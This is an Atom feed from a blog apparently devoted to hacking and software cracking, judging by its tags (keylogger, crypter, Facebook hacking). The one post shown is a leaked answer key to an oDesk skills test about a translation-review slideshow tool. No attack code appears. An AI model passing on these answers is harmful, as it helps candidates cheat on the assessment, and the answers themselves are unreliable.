<?xml version='1.0' encoding='UTF-8'?><?xml-stylesheet href="http://www.blogger.com/styles/atom.css" type="text/css"?><feed xmlns='http://www.w3.org/2005/Atom' xmlns:openSearch='http://a9.com/-/spec/opensearch/1.1/' xmlns:blogger='http://schemas.google.com/blogger/2008' xmlns:georss='http://www.georss.org/georss' xmlns:gd='http://schemas.google.com/g/2005' xmlns:thr='http://purl.org/syndication/thread/1.0' gd:etag='W/&quot;Ak8HQ3o8fCp7ImA9WhBTEk8.&quot;'><id>tag:blogger.com,1999:blog-921095381650575288</id><updated>2013-02-07T15:20:32.474+06:00</updated><category term='download serial key'/><category term='All kind of software unlock'/><category term='serial key search'/><category term='Hacking google web Database'/><category term='Web Development'/><category term='Windows computer tips'/><category term='google tricks'/><category term='Internet'/><category term='oDesk test'/><category term='keylogger'/><category term='TeleCommunication'/><category term='Virus'/><category term='Hack all kind of tailsoftware'/><category term='Freelanching'/><category term='Crypter'/><category term='Odesk'/><category term='web Site Hacking'/><category term='Hacking'/><category term='PC Tips'/><category term='Tricks 94 FBR'/><category term='Web Devolopment'/><category term='run tail software free'/><category term='Hacking Facebook'/><title>Bangladesh  Cyber Army !</title><subtitle type='html'>Hacking Is An Art !</subtitle><link rel='http://schemas.google.com/g/2005#feed' type='application/atom+xml' href='http://made-by-bangladesh.blogspot.com/feeds/posts/default'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/921095381650575288/posts/default?redirect=false&amp;v=2'/><link rel='alternate' type='text/html' href='http://made-by-bangladesh.blogspot.com/'/><link rel='hub' href='http://pubsubhubbub.appspot.com/'/><link rel='next' type='application/atom+xml' href='http://www.blogger.com/feeds/921095381650575288/posts/default?start-index=26&amp;max-results=25&amp;redirect=false&amp;v=2'/><author><name>Sajal Mondal</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='//lh6.googleusercontent.com/-PWKcdujUFv8/AAAAAAAAAAI/AAAAAAAAASY/dzhIK6bFxxY/s512-c/photo.jpg'/></author><generator version='7.00' uri='http://www.blogger.com'>Blogger</generator><openSearch:totalResults>46</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>25</openSearch:itemsPerPage><entry gd:etag='W/&quot;DE8BQn0-cSp7ImA9WhBTEEk.&quot;'><id>tag:blogger.com,1999:blog-921095381650575288.post-2979724387676269473</id><published>2013-02-05T12:47:00.003+06:00</published><updated>2013-02-05T12:47:33.359+06:00</updated><app:edited xmlns:app='http://www.w3.org/2007/app'>2013-02-05T12:47:33.359+06:00</app:edited><category scheme='http://www.blogger.com/atom/ns#' term='Freelanching'/><category scheme='http://www.blogger.com/atom/ns#' term='oDesk test'/><category scheme='http://www.blogger.com/atom/ns#' term='Odesk'/><title>oDesk Slideshow Product Test 2013</title><content type='html'>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://4.bp.blogspot.com/-h8jXFEx6fLs/URCpZlEncPI/AAAAAAAAAT0/sAZYE66R4ik/s1600/oDesk.PNG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="199" src="http://4.bp.blogspot.com/-h8jXFEx6fLs/URCpZlEncPI/AAAAAAAAAT0/sAZYE66R4ik/s320/oDesk.PNG" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div align="center" class="MsoNormal" style="background-position: initial initial; background-repeat: initial initial; text-align: center;"&gt;
&lt;span style="background-color: white;"&gt;&lt;b&gt;&lt;u&gt;&lt;span style="font-size: 18pt;"&gt;Slideshow
Product Test&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;span style="font-size: 7.5pt;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div align="center" class="MsoNormal" style="background-position: initial initial; background-repeat: initial initial; line-height: 10pt; text-align: center;"&gt;
&lt;span style="background-color: white;"&gt;&lt;i&gt;&lt;span style="font-size: 7.5pt;"&gt;Top 10 Percent
All-time &lt;/span&gt;&lt;/i&gt;&lt;st1:street&gt;&lt;st1:address&gt;&lt;i&gt;&lt;span style="font-size: 7.5pt;"&gt;1st Place&lt;/span&gt;&lt;/i&gt;&lt;/st1:address&gt;&lt;/st1:street&gt;&lt;span style="font-size: 7.5pt;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div align="center" class="MsoNormal" style="background-position: initial initial; background-repeat: initial initial; line-height: 10pt; text-align: center;"&gt;
&lt;span style="background-color: white;"&gt;&lt;i&gt;&lt;span style="font-size: 7.5pt;"&gt;Score: 5.0&lt;/span&gt;&lt;/i&gt;&lt;span style="font-size: 7.5pt;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="background-position: initial initial; background-repeat: initial initial; line-height: 10pt; text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="background-position: initial initial; background-repeat: initial initial; line-height: 10pt; text-align: justify;"&gt;
&lt;span style="background-color: white; font-size: 7.5pt;"&gt;Question:&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="background-position: initial initial; background-repeat: initial initial; line-height: 10pt; text-align: justify;"&gt;
&lt;span style="background-color: white; font-size: 7.5pt;"&gt;By editing the translation,
slideshow will automatically update the LQE tool.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="background-position: initial initial; background-repeat: initial initial; line-height: 10pt; text-align: justify;"&gt;
&lt;span style="background-color: white; font-size: 7.5pt;"&gt;a.&lt;span class="apple-tab-span"&gt; &lt;/span&gt;True&amp;nbsp;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="background-position: initial initial; background-repeat: initial initial; line-height: 10pt; text-align: justify;"&gt;
&lt;span style="background-color: white; font-size: 7.5pt;"&gt;b.&lt;span class="apple-tab-span"&gt; &lt;/span&gt;False&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="background-position: initial initial; background-repeat: initial initial; line-height: 10pt; text-align: justify;"&gt;
&lt;span style="background-color: white; font-size: 7.5pt;"&gt;Answer: b&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="background-position: initial initial; background-repeat: initial initial; line-height: 10pt; text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="background-position: initial initial; background-repeat: initial initial; line-height: 10pt; text-align: justify;"&gt;
&lt;span style="background-color: white; font-size: 7.5pt;"&gt;Question:&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="background-position: initial initial; background-repeat: initial initial; line-height: 10pt; text-align: justify;"&gt;
&lt;span style="background-color: white; font-size: 7.5pt;"&gt;Every project has a unique
slideshow URL.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="background-position: initial initial; background-repeat: initial initial; line-height: 10pt; text-align: justify;"&gt;
&lt;span style="background-color: white; font-size: 7.5pt;"&gt;a.&lt;span class="apple-tab-span"&gt; &lt;/span&gt;True&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="background-position: initial initial; background-repeat: initial initial; line-height: 10pt; text-align: justify;"&gt;
&lt;span style="background-color: white; font-size: 7.5pt;"&gt;b.&lt;span class="apple-tab-span"&gt; &lt;/span&gt;False&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="background-position: initial initial; background-repeat: initial initial; line-height: 10pt; text-align: justify;"&gt;
&lt;span style="background-color: white; font-size: 7.5pt;"&gt;Answer: a&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="background-position: initial initial; background-repeat: initial initial; line-height: 10pt; text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="background-position: initial initial; background-repeat: initial initial; line-height: 10pt; text-align: justify;"&gt;
&lt;span style="background-color: white; font-size: 7.5pt;"&gt;Question:&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="background-position: initial initial; background-repeat: initial initial; line-height: 10pt; text-align: justify;"&gt;
&lt;span style="background-color: white; font-size: 7.5pt;"&gt;How do you review strings
that have no screenshots in the slideshow?&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="background-position: initial initial; background-repeat: initial initial; line-height: 10pt; text-align: justify;"&gt;
&lt;span style="background-color: white; font-size: 7.5pt;"&gt;a.&lt;span class="apple-tab-span"&gt; &lt;/span&gt;You can’t, they don’t appear anywhere in slideshow&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="background-position: initial initial; background-repeat: initial initial; line-height: 10pt; text-align: justify;"&gt;
&lt;span style="background-color: white; font-size: 7.5pt;"&gt;b.&lt;span class="apple-tab-span"&gt; &lt;/span&gt;Click on the show message button&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="background-position: initial initial; background-repeat: initial initial; line-height: 10pt; text-align: justify;"&gt;
&lt;span style="background-color: white; font-size: 7.5pt;"&gt;c.&lt;span class="apple-tab-span"&gt; &lt;/span&gt;Navigate to the last slide of the slideshow&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="background-position: initial initial; background-repeat: initial initial; line-height: 10pt; text-align: justify;"&gt;
&lt;span style="background-color: white; font-size: 7.5pt;"&gt;d.&lt;span class="apple-tab-span"&gt; &lt;/span&gt;All of the above&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="background-position: initial initial; background-repeat: initial initial; line-height: 10pt; text-align: justify;"&gt;
&lt;span style="background-color: white; font-size: 7.5pt;"&gt;e.&lt;span class="apple-tab-span"&gt; &lt;/span&gt;None of the above&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="background-position: initial initial; background-repeat: initial initial; line-height: 10pt; text-align: justify;"&gt;
&lt;span style="background-color: white; font-size: 7.5pt;"&gt;Answer: b&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="background-position: initial initial; background-repeat: initial initial; line-height: 10pt; text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="background-position: initial initial; background-repeat: initial initial; line-height: 10pt; text-align: justify;"&gt;
&lt;span style="background-color: white; font-size: 7.5pt;"&gt;Question:&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="background-position: initial initial; background-repeat: initial initial; line-height: 10pt; text-align: justify;"&gt;
&lt;span style="background-color: white; font-size: 7.5pt;"&gt;Which browser is the most
optional to run slideshow on?&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="background-position: initial initial; background-repeat: initial initial; line-height: 10pt; text-align: justify;"&gt;
&lt;span style="background-color: white; font-size: 7.5pt;"&gt;a.&lt;span class="apple-tab-span"&gt; &lt;/span&gt;Internet Explorer&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="background-position: initial initial; background-repeat: initial initial; line-height: 10pt; text-align: justify;"&gt;
&lt;span style="background-color: white; font-size: 7.5pt;"&gt;b.&lt;span class="apple-tab-span"&gt; &lt;/span&gt;Firefox&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="background-position: initial initial; background-repeat: initial initial; line-height: 10pt; text-align: justify;"&gt;
&lt;span style="background-color: white; font-size: 7.5pt;"&gt;c.&lt;span class="apple-tab-span"&gt; &lt;/span&gt;Safari&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="background-position: initial initial; background-repeat: initial initial; line-height: 10pt; text-align: justify;"&gt;
&lt;span style="background-color: white; font-size: 7.5pt;"&gt;d.&lt;span class="apple-tab-span"&gt; &lt;/span&gt;Chrome&amp;nbsp;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="background-position: initial initial; background-repeat: initial initial; line-height: 10pt; text-align: justify;"&gt;
&lt;span style="background-color: white; font-size: 7.5pt;"&gt;e.&lt;span class="apple-tab-span"&gt; &lt;/span&gt;None of the above&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="background-position: initial initial; background-repeat: initial initial; line-height: 10pt; text-align: justify;"&gt;
&lt;span style="background-color: white; font-size: 7.5pt;"&gt;Answer: b&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="background-position: initial initial; background-repeat: initial initial; line-height: 10pt; text-align: justify;"&gt;
&lt;span style="background-color: white; font-size: 7.5pt;"&gt; &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="background-position: initial initial; background-repeat: initial initial; line-height: 10pt; text-align: justify;"&gt;
&lt;span style="background-color: white; font-size: 7.5pt;"&gt;Question:&amp;nbsp;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="background-position: initial initial; background-repeat: initial initial; line-height: 10pt; text-align: justify;"&gt;
&lt;span style="background-color: white; font-size: 7.5pt;"&gt;What are the prerequisites
required to being able to view a slideshow?&amp;nbsp;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="background-position: initial initial; background-repeat: initial initial; line-height: 10pt; text-align: justify;"&gt;
&lt;span style="background-color: white; font-size: 7.5pt;"&gt;a.&lt;span class="apple-tab-span"&gt; &lt;/span&gt;GCRT extension installed&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="background-position: initial initial; background-repeat: initial initial; line-height: 10pt; text-align: justify;"&gt;
&lt;span style="background-color: white; font-size: 7.5pt;"&gt;b.&lt;span class="apple-tab-span"&gt; &lt;/span&gt;Access to the external tc&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="background-position: initial initial; background-repeat: initial initial; line-height: 10pt; text-align: justify;"&gt;
&lt;span style="background-color: white; font-size: 7.5pt;"&gt;c.&lt;span class="apple-tab-span"&gt; &lt;/span&gt;A link to the slideshow&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="background-position: initial initial; background-repeat: initial initial; line-height: 10pt; text-align: justify;"&gt;
&lt;span style="background-color: white; font-size: 7.5pt;"&gt;d.&lt;span class="apple-tab-span"&gt; &lt;/span&gt;All of the above&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="background-position: initial initial; background-repeat: initial initial; line-height: 10pt; text-align: justify;"&gt;
&lt;span style="background-color: white; font-size: 7.5pt;"&gt;e.&lt;span class="apple-tab-span"&gt; &lt;/span&gt;None of the above&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="background-position: initial initial; background-repeat: initial initial; line-height: 10pt; text-align: justify;"&gt;
&lt;span style="background-color: white; font-size: 7.5pt;"&gt;Answer: d&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="background-position: initial initial; background-repeat: initial initial; line-height: 10pt; text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="background-position: initial initial; background-repeat: initial initial; line-height: 10pt; text-align: justify;"&gt;
&lt;span style="background-color: white; font-size: 7.5pt;"&gt;Question:&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="background-position: initial initial; background-repeat: initial initial; line-height: 10pt; text-align: justify;"&gt;
&lt;span style="background-color: white; font-size: 7.5pt;"&gt;What is the correct order
for leaving comments?&amp;nbsp;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="background-position: initial initial; background-repeat: initial initial; line-height: 10pt; text-align: justify;"&gt;
&lt;span style="background-color: white; font-size: 7.5pt;"&gt;a.&lt;span class="apple-tab-span"&gt; &lt;/span&gt;Reason for change, LQE code&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="background-position: initial initial; background-repeat: initial initial; line-height: 10pt; text-align: justify;"&gt;
&lt;span style="background-color: white; font-size: 7.5pt;"&gt;b.&lt;span class="apple-tab-span"&gt; &lt;/span&gt;LQE code, reason for change&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="background-position: initial initial; background-repeat: initial initial; line-height: 10pt; text-align: justify;"&gt;
&lt;span style="background-color: white; font-size: 7.5pt;"&gt;c.&lt;span class="apple-tab-span"&gt; &lt;/span&gt;Either order would work&amp;nbsp;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="background-position: initial initial; background-repeat: initial initial; line-height: 10pt; text-align: justify;"&gt;
&lt;span style="background-color: white; font-size: 7.5pt;"&gt;d.&lt;span class="apple-tab-span"&gt; &lt;/span&gt;All of the above&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="background-position: initial initial; background-repeat: initial initial; line-height: 10pt; text-align: justify;"&gt;
&lt;span style="background-color: white; font-size: 7.5pt;"&gt;e.&lt;span class="apple-tab-span"&gt; &lt;/span&gt;None of the above&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="background-position: initial initial; background-repeat: initial initial; line-height: 10pt; text-align: justify;"&gt;
&lt;span style="background-color: white; font-size: 7.5pt;"&gt;Answer: b&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="background-position: initial initial; background-repeat: initial initial; line-height: 10pt; text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="background-position: initial initial; background-repeat: initial initial; line-height: 10pt; text-align: justify;"&gt;
&lt;span style="background-color: white; font-size: 7.5pt;"&gt;Question:&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="background-position: initial initial; background-repeat: initial initial; line-height: 10pt; text-align: justify;"&gt;
&lt;span style="background-color: white; font-size: 7.5pt;"&gt;Which of the following is
not true of approving/reviewing suggestions?&amp;nbsp;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="background-position: initial initial; background-repeat: initial initial; line-height: 10pt; text-align: justify;"&gt;
&lt;span style="background-color: white; font-size: 7.5pt;"&gt;a.&lt;span class="apple-tab-span"&gt; &lt;/span&gt;You can select multiple suggestions at a time to
approve or reject&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="background-position: initial initial; background-repeat: initial initial; line-height: 10pt; text-align: justify;"&gt;
&lt;span style="background-color: white; font-size: 7.5pt;"&gt;b.&lt;span class="apple-tab-span"&gt; &lt;/span&gt;You can’t approve two of the same suggestions at
the same time&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="background-position: initial initial; background-repeat: initial initial; line-height: 10pt; text-align: justify;"&gt;
&lt;span style="background-color: white; font-size: 7.5pt;"&gt;c.&lt;span class="apple-tab-span"&gt; &lt;/span&gt;A blank page of suggestions means you have hit an
error&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="background-position: initial initial; background-repeat: initial initial; line-height: 10pt; text-align: justify;"&gt;
&lt;span style="background-color: white; font-size: 7.5pt;"&gt;d.&lt;span class="apple-tab-span"&gt; &lt;/span&gt;They all are not true&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="background-position: initial initial; background-repeat: initial initial; line-height: 10pt; text-align: justify;"&gt;
&lt;span style="background-color: white; font-size: 7.5pt;"&gt;e.&lt;span class="apple-tab-span"&gt; &lt;/span&gt;None of the above&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="background-position: initial initial; background-repeat: initial initial; line-height: 10pt; text-align: justify;"&gt;
&lt;span style="background-color: white; font-size: 7.5pt;"&gt;Answer: c&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="background-position: initial initial; background-repeat: initial initial; line-height: 10pt; text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="background-position: initial initial; background-repeat: initial initial; line-height: 10pt; text-align: justify;"&gt;
&lt;span style="background-color: white; font-size: 7.5pt;"&gt;Question:&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="background-position: initial initial; background-repeat: initial initial; line-height: 10pt; text-align: justify;"&gt;
&lt;span style="background-color: white; font-size: 7.5pt;"&gt;If you’re unable to edit a
translation after you’ve been able to highlight it, it’s likely that:&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="background-position: initial initial; background-repeat: initial initial; line-height: 10pt; text-align: justify;"&gt;
&lt;span style="background-color: white; font-size: 7.5pt;"&gt;a.&lt;span class="apple-tab-span"&gt; &lt;/span&gt;You didn’t hit the escape key to lock the
translation&amp;nbsp;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="background-position: initial initial; background-repeat: initial initial; line-height: 10pt; text-align: justify;"&gt;
&lt;span style="background-color: white; font-size: 7.5pt;"&gt;b.&lt;span class="apple-tab-span"&gt; &lt;/span&gt;You don’t have GCRT installed&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="background-position: initial initial; background-repeat: initial initial; line-height: 10pt; text-align: justify;"&gt;
&lt;span style="background-color: white; font-size: 7.5pt;"&gt;c.&lt;span class="apple-tab-span"&gt; &lt;/span&gt;The system feels the translation should not be
edited&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="background-position: initial initial; background-repeat: initial initial; line-height: 10pt; text-align: justify;"&gt;
&lt;span style="background-color: white; font-size: 7.5pt;"&gt;d.&lt;span class="apple-tab-span"&gt; &lt;/span&gt;All of the above&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="background-position: initial initial; background-repeat: initial initial; line-height: 10pt; text-align: justify;"&gt;
&lt;span style="background-color: white; font-size: 7.5pt;"&gt;e.&lt;span class="apple-tab-span"&gt; &lt;/span&gt;None of the above&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="background-position: initial initial; background-repeat: initial initial; line-height: 10pt; text-align: justify;"&gt;
&lt;span style="background-color: white; font-size: 7.5pt;"&gt;Answer: a&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="background-position: initial initial; background-repeat: initial initial; line-height: 10pt; text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="background-position: initial initial; background-repeat: initial initial; line-height: 10pt; text-align: justify;"&gt;
&lt;span style="background-color: white; font-size: 7.5pt;"&gt;Question:&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="background-position: initial initial; background-repeat: initial initial; line-height: 10pt; text-align: justify;"&gt;
&lt;span style="background-color: white; font-size: 7.5pt;"&gt;How do you get to the
language you want to review?&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="background-position: initial initial; background-repeat: initial initial; line-height: 10pt; text-align: justify;"&gt;
&lt;span style="background-color: white; font-size: 7.5pt;"&gt;a.&lt;span class="apple-tab-span"&gt; &lt;/span&gt;The system automatically redirects to your
language&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="background-position: initial initial; background-repeat: initial initial; line-height: 10pt; text-align: justify;"&gt;
&lt;span style="background-color: white; font-size: 7.5pt;"&gt;b.&lt;span class="apple-tab-span"&gt; &lt;/span&gt;Click on the link with your language&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="background-position: initial initial; background-repeat: initial initial; line-height: 10pt; text-align: justify;"&gt;
&lt;span style="background-color: white; font-size: 7.5pt;"&gt;c.&lt;span class="apple-tab-span"&gt; &lt;/span&gt;Select from the drop-down box&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="background-position: initial initial; background-repeat: initial initial; line-height: 10pt; text-align: justify;"&gt;
&lt;span style="background-color: white; font-size: 7.5pt;"&gt;d.&lt;span class="apple-tab-span"&gt; &lt;/span&gt;All of the above&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="background-position: initial initial; background-repeat: initial initial; line-height: 10pt; text-align: justify;"&gt;
&lt;span style="background-color: white; font-size: 7.5pt;"&gt;e.&lt;span class="apple-tab-span"&gt; &lt;/span&gt;None of the above&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="background-position: initial initial; background-repeat: initial initial; line-height: 10pt; text-align: justify;"&gt;
&lt;span style="background-color: white; font-size: 7.5pt;"&gt;Answer: c&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="background-position: initial initial; background-repeat: initial initial; line-height: 10pt; text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="background-position: initial initial; background-repeat: initial initial; line-height: 10pt; text-align: justify;"&gt;
&lt;span style="background-color: white; font-size: 7.5pt;"&gt;Question:&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="background-position: initial initial; background-repeat: initial initial; line-height: 10pt; text-align: justify;"&gt;
&lt;span style="background-color: white; font-size: 7.5pt;"&gt;What basic information is provided
in each slideshow?&amp;nbsp;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="background-position: initial initial; background-repeat: initial initial; line-height: 10pt; text-align: justify;"&gt;
&lt;span style="background-color: white; font-size: 7.5pt;"&gt;a.&lt;span class="apple-tab-span"&gt; &lt;/span&gt;Number of message to be reviewed&amp;nbsp;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="background-position: initial initial; background-repeat: initial initial; line-height: 10pt; text-align: justify;"&gt;
&lt;span style="background-color: white; font-size: 7.5pt;"&gt;b.&lt;span class="apple-tab-span"&gt; &lt;/span&gt;Number of screenshots to be reviewed&amp;nbsp;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="background-position: initial initial; background-repeat: initial initial; line-height: 10pt; text-align: justify;"&gt;
&lt;span style="background-color: white; font-size: 7.5pt;"&gt;c.&lt;span class="apple-tab-span"&gt; &lt;/span&gt;Number of message approved and rejected&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="background-position: initial initial; background-repeat: initial initial; line-height: 10pt; text-align: justify;"&gt;
&lt;span style="background-color: white; font-size: 7.5pt;"&gt;d.&lt;span class="apple-tab-span"&gt; &lt;/span&gt;All of the above&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="background-position: initial initial; background-repeat: initial initial; line-height: 10pt; text-align: justify;"&gt;
&lt;span style="background-color: white; font-size: 7.5pt;"&gt;e.&lt;span class="apple-tab-span"&gt; &lt;/span&gt;None of the above&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
